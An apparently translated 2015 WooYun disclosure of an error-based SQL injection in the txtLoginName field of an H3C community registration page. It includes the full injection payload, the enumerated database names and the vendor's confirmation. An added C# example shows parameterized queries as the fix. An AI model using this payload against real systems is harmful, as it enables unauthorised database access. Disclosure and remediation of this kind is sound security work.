
Vulnerability summary

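Bug ID: wooyun-2015-096781

Title: POST injection in an H3C system

Vendor: H3C

Author: 路人甲

Submitted: 2015-02-14 10:12

Fixed: 2015-03-31 10:14

Publicly disclosed: 2015-03-31 10:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by the vendor

Source: http://www.wooyun.org; if you have questions or need help, contact [email protected]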


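Vulnerability details

Disclosure status:

2015-02-14: Details reported to the vendor; awaiting vendor handling
2015-02-15: Vendor confirmed; details disclosed to the vendor only
2015-02-25: Details disclosed to core white hats and experts in related fields
2015-03-07: Details disclosed to regular white hats
2015-03-17: Details disclosed to intern white hats
2015-03-31: Details disclosed to the public

Brief description:

Uh... this shouldn't be a duplicate, right?

Detailed description:

http://h3community.h3c.com:80/Member/RegistrationPage.aspx
On the registration page, txtLoginName is vulnerable to POST injection

Proof of vulnerability: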

Parameter: txtLoginName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTE1MDQyNjUwMTcPZBYCAgMPZBYgAgMPZBYCAh8PDxYCHgdWaXNpYmxlZ2RkAgcPDxYCHgxFcnJvck1lc3NhZ2UFHENvbXBhbnkgTmFtZSBNaXNzaW5nICBJbnB1dCFkZAILDw8WAh8BBRROYW1lIE1pc3NpbmcgIElucHV0IWRkAg8PDxYCHwEFFVRpdGxlIE1pc3NpbmcgIElucHV0IWRkAhMPDxYCHwEFGVRlbGVwaG9uZSBNaXNzaW5nICBJbnB1dCFkZAIXDw8WAh8BBRxNb2JpbGUgUGhvbmUgTWlzc2luZyAgSW5wdXQhZGQCGw8PFgIfAQUbQ28uIGFkZHJlc3MgTWlzc2luZyAgSW5wdXQhZGQCHw8PFgIfAQUTRmF4IE1pc3NpbmcgIElucHV0IWRkAiMPDxYCHwEFFUVtYWlsIE1pc3NpbmcgIElucHV0IWRkAiQPDxYCHwEFDEVtYWlsIFdyb25nIWRkAigPDxYCHwEFGkxvZ2luIE5hbWUgTWlzc2luZyAgSW5wdXQhZGQCKg8PFgIfAQUiTWluaW11bSA2IEFscGhhbnVtZXJpYyBDaGFyYWN0ZXJzIWRkAiwPDxYCHgdFbmFibGVkaGRkAi4PDxYCHgRUZXh0ZWRkAjAPDxYCHwJnZGQCMg8WAh4IZGlzYWJsZWQFCGRpc2FibGVkZGQxn310x8n+6Yu92XB+lZvtoDt4uw==&txtCompany=KHfj&txtName=&txtTitle=bHNY&txtTelephone=&txtMobilePhone=kIww&txtAddress=&txtFax=SLrR&txtEmail=&txtLoginName=SFCg' AND 4133=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4133=4133) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'TxaM'='TxaM&btAgree=Agree&__EVENTVALIDATION=/wEWDALcjoebCgKXv9ziDwLEhISFCwL55JyzBAK287TlCgLm4ZKMBALv7ITZAgKH+/LHDgKE8/26DAKpwK/OBgLm+tPhCwLoqK/YB3GaXn478AtSlYagT+j7eMS84oUv
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user is DBA: False
available databases [9]:
[*] CMS2007_Admin_DB
[*] CMS2007_Portal_DB
[*] CMS2007_Portal_DB_CN
[*] COPYTS
[*] distribution
[*] master
[*] model
[*] msdb
[*] tempdb
Database: CMS2007_Admin_DB
[724 tables]

Remediation:

Filtering

Copyright notice: when reposting, please credit the source 路人甲@乌云
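The following added example, which is not code from the reported site or from the report's author, contrasts the string-concatenated query pattern that makes a field such as txtLoginName injectable with a parameterized lookup that also keeps DBMS error text out of the response. The class name, the dbo.Members table, the LoginName column and the 6-32 alphanumeric policy are assumptions for illustration.

```csharp
// Added example: hypothetical code-behind helper for a registration page like the
// one in the report. Table, column and class names are assumptions, not site code.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class LoginNameCheck
{
    // Assumed policy: 6-32 ASCII letters or digits. Validation narrows the input,
    // but the parameterized query below is what removes the injection.
    private static readonly Regex Allowed = new Regex(@"\A[A-Za-z0-9]{6,32}\z");

    // VULNERABLE pattern: the POST value is concatenated into the statement, so a
    // quote in txtLoginName ends the string literal and the rest is parsed as SQL.
    public static string BuildUnsafeQuery(string loginName)
    {
        return "SELECT COUNT(*) FROM dbo.Members WHERE LoginName = '" + loginName + "'";
    }

    // HARDENED: the value travels as a typed parameter and is never parsed as SQL.
    public static bool LoginNameExists(string connectionString, string loginName)
    {
        if (loginName == null || !Allowed.IsMatch(loginName))
            throw new ArgumentException("Invalid login name.");

        const string sql =
            "SELECT COUNT(*) FROM dbo.Members WHERE LoginName = @loginName";
        try
        {
            using (SqlConnection conn = new SqlConnection(connectionString))
            using (SqlCommand cmd = new SqlCommand(sql, conn))
            {
                cmd.Parameters.Add("@loginName", SqlDbType.NVarChar, 32).Value = loginName;
                conn.Open();
                return (int)cmd.ExecuteScalar() > 0;
            }
        }
        catch (SqlException ex)
        {
            // Error-based injection depends on DBMS error text reaching the response.
            // Log the detail server-side and surface only a generic failure.
            System.Diagnostics.Trace.TraceError("Login name lookup failed: {0}", ex);
            throw new ApplicationException("Registration is temporarily unavailable.");
        }
    }
}
```

Filtering alone leaves the concatenated statement in place; binding the value as a parameter is what stops the conversion-error technique shown in the proof output from being parsed as SQL.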


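Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-02-15 14:33

Vendor reply:

After investigation, the vulnerability does exist, and the relevant staff have been notified to handle it. Thank you for your attention to H3C and for your hard work on H3C's information security!

Latest status:

None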


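Vulnerability comments:

Comments

  1. 2015-02-14 10:53 | jianFen (Regular white hat | Rank: 530, Vulnerabilities: 83 | Avoid the sharp edge, strike from an unexpected angle)

    Heh, in such a hurry. Delay injection, and you submit without even getting into the system.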